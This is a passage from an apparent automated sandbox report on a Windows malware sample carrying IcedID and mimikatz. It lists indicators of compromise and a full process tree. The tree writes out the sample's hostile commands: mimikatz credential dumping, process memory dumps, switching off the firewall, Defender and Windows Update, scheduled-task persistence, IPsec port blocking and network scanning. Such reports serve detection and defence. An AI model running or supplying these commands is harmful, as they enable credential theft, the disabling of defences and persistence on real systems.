created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ puelpci.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1076 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1000 puelpci.exe Token: SeDebugPrivilege 1764 puelpci.exe Token: SeDebugPrivilege 472 vfshost.exe Token: SeDebugPrivilege 1364 tvfbneign.exe Token: SeLockMemoryPrivilege 4616 dlbkbn.exe Token: SeLockMemoryPrivilege 4616 dlbkbn.exe Token: SeDebugPrivilege 888 tvfbneign.exe Token: SeDebugPrivilege 4592 tvfbneign.exe Token: SeDebugPrivilege 3152 tvfbneign.exe Token: SeDebugPrivilege 1048 tvfbneign.exe Token: SeDebugPrivilege 4456 tvfbneign.exe Token: SeDebugPrivilege 3868 tvfbneign.exe Token: SeDebugPrivilege 4132 tvfbneign.exe Token: SeDebugPrivilege 1976 tvfbneign.exe Token: SeDebugPrivilege 3304 tvfbneign.exe Token: SeDebugPrivilege 2712 tvfbneign.exe Token: SeDebugPrivilege 3528 tvfbneign.exe Token: SeDebugPrivilege 3232 tvfbneign.exe Token: SeDebugPrivilege 1616 tvfbneign.exe Token: SeDebugPrivilege 2340 tvfbneign.exe Token: SeDebugPrivilege 5968 tvfbneign.exe Token: SeDebugPrivilege 5652 tvfbneign.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe 1000 puelpci.exe 1000 puelpci.exe 1764 puelpci.exe 1764 puelpci.exe 4524 xohudmc.exe 872 varpws.exe 824 puelpci.exe 824 puelpci.exe 5320 puelpci.exe 5320 puelpci.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1840 wrote to memory of 3460 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe 88 PID 1840 wrote to memory of 3460 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe 88 PID 1840 wrote to memory of 3460 1840 2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe 88 PID 3460 wrote to memory of 1076 3460 cmd.exe 90 PID 3460 wrote to memory of 1076 3460 cmd.exe 90 PID 3460 wrote to memory of 1076 3460 cmd.exe 90 PID 3460 wrote to memory of 1000 3460 cmd.exe 99 PID 3460 wrote to memory of 1000 3460 cmd.exe 99 PID 3460 wrote to memory of 1000 3460 cmd.exe 99 PID 1764 wrote to memory of 4920 1764 puelpci.exe 102 PID 1764 wrote to memory of 4920 1764 puelpci.exe 102 PID 1764 wrote to memory of 4920 1764 puelpci.exe 102 PID 4920 wrote to memory of 1688 4920 cmd.exe 104 PID 4920 wrote to memory of 1688 4920 cmd.exe 104 PID 4920 wrote to memory of 1688 4920 cmd.exe 104 PID 4920 wrote to memory of 3128 4920 cmd.exe 105 PID 4920 wrote to memory of 3128 4920 cmd.exe 105 PID 4920 wrote to memory of 3128 4920 cmd.exe 105 PID 4920 wrote to memory of 2232 4920 cmd.exe 106 PID 4920 wrote to memory of 2232 4920 cmd.exe 106 PID 4920 wrote to memory of 2232 4920 cmd.exe 106 PID 4920 wrote to memory of 1348 4920 cmd.exe 107 PID 4920 wrote to memory of 1348 4920 cmd.exe 107 PID 4920 wrote to memory of 1348 4920 cmd.exe 107 PID 4920 wrote to memory of 3636 4920 cmd.exe 108 PID 4920 wrote to memory of 3636 4920 cmd.exe 108 PID 4920 wrote to memory of 3636 4920 cmd.exe 108 PID 4920 wrote to memory of 1624 4920 cmd.exe 109 PID 4920 wrote to memory of 1624 4920 cmd.exe 109 PID 4920 wrote to memory of 1624 4920 cmd.exe 109 PID 1764 wrote to memory of 648 1764 puelpci.exe 110 PID 1764 wrote to memory of 648 1764 puelpci.exe 110 PID 1764 wrote to memory of 648 1764 puelpci.exe 110 PID 1764 wrote to memory of 3300 1764 puelpci.exe 112 PID 1764 wrote to memory of 3300 1764 puelpci.exe 112 PID 1764 wrote to memory of 3300 1764 puelpci.exe 112 PID 1764 wrote to memory of 4452 1764 puelpci.exe 114 PID 1764 wrote to memory of 4452 1764 puelpci.exe 114 PID 1764 wrote to memory of 4452 1764 puelpci.exe 114 PID 1764 wrote to memory of 1364 1764 puelpci.exe 118 PID 1764 wrote to memory of 1364 1764 puelpci.exe 118 PID 1764 wrote to memory of 1364 1764 puelpci.exe 118 PID 1364 wrote to memory of 2080 1364 cmd.exe 120 PID 1364 wrote to memory of 2080 1364 cmd.exe 120 PID 1364 wrote to memory of 2080 1364 cmd.exe 120 PID 2080 wrote to memory of 1984 2080 wpcap.exe 121 PID 2080 wrote to memory of 1984 2080 wpcap.exe 121 PID 2080 wrote to memory of 1984 2080 wpcap.exe 121 PID 1984 wrote to memory of 1248 1984 net.exe 123 PID 1984 wrote to memory of 1248 1984 net.exe 123 PID 1984 wrote to memory of 1248 1984 net.exe 123 PID 2080 wrote to memory of 2452 2080 wpcap.exe 124 PID 2080 wrote to memory of 2452 2080 wpcap.exe 124 PID 2080 wrote to memory of 2452 2080 wpcap.exe 124 PID 2452 wrote to memory of 2912 2452 net.exe 126 PID 2452 wrote to memory of 2912 2452 net.exe 126 PID 2452 wrote to memory of 2912 2452 net.exe 126 PID 2080 wrote to memory of 3236 2080 wpcap.exe 127 PID 2080 wrote to memory of 3236 2080 wpcap.exe 127 PID 2080 wrote to memory of 3236 2080 wpcap.exe 127 PID 3236 wrote to memory of 2752 3236 net.exe 129 PID 3236 wrote to memory of 2752 3236 net.exe 129 PID 3236 wrote to memory of 2752 3236 net.exe 129 PID 2080 wrote to memory of 2232 2080 wpcap.exe 130
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2160
-
C:\Windows\TEMP\irlfzpltl\dlbkbn.exe"C:\Windows\TEMP\irlfzpltl\dlbkbn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Users\Admin\AppData\Local\Temp\2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-03-09_74e1e0877fc19c4468e50e36323ce156_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ibimzzri\puelpci.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1076
-
-
C:\Windows\ibimzzri\puelpci.exeC:\Windows\ibimzzri\puelpci.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1000
-
-
-
C:\Windows\ibimzzri\puelpci.exeC:\Windows\ibimzzri\puelpci.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2232
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3636
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:648
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\btlbpeceu\hnkiaiely\wpcap.exeC:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1248
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2912
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2752
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3672
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:924
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4556
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4604
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1108
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt2⤵PID:1044
-
C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exeC:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\btlbpeceu\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1696 -
C:\Windows\btlbpeceu\Corporate\vfshost.exeC:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"2⤵PID:2916
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"3⤵
- Creates scheduled task(s)
PID:3384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"2⤵PID:4452
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1192
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"2⤵PID:1976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4176
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:224
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:64
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4516
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3896
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 760 C:\Windows\TEMP\btlbpeceu\760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:5024
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:4384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3720
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3876
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1628
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3304
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1356
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2060
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:3548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1472
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:3520
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2444
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:1076
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1616
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1500
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:5000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3724
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4172
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4684
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1304
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4524
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 316 C:\Windows\TEMP\btlbpeceu\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2160 C:\Windows\TEMP\btlbpeceu\2160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2548 C:\Windows\TEMP\btlbpeceu\2548.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2660 C:\Windows\TEMP\btlbpeceu\2660.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2792 C:\Windows\TEMP\btlbpeceu\2792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3088 C:\Windows\TEMP\btlbpeceu\3088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3856 C:\Windows\TEMP\btlbpeceu\3856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3976 C:\Windows\TEMP\btlbpeceu\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4052 C:\Windows\TEMP\btlbpeceu\4052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1496 C:\Windows\TEMP\btlbpeceu\1496.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 780 C:\Windows\TEMP\btlbpeceu\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1972 C:\Windows\TEMP\btlbpeceu\1972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4892 C:\Windows\TEMP\btlbpeceu\4892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3276 C:\Windows\TEMP\btlbpeceu\3276.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\btlbpeceu\hnkiaiely\scan.bat2⤵PID:232
-
C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exeblitiliem.exe TCP 89.149.0.1 89.149.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3348
-
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 232 C:\Windows\TEMP\btlbpeceu\232.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5968
-
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4604 C:\Windows\TEMP\btlbpeceu\4604.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5420
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5364
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5672
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5944
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4388
-
-
-
C:\Windows\SysWOW64\varpws.exeC:\Windows\SysWOW64\varpws.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:872
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe1⤵PID:472
-
C:\Windows\ime\puelpci.exeC:\Windows\ime\puelpci.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:824
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F1⤵PID:1632
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5028
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F2⤵PID:2572
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F1⤵PID:3808
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4960
-
-
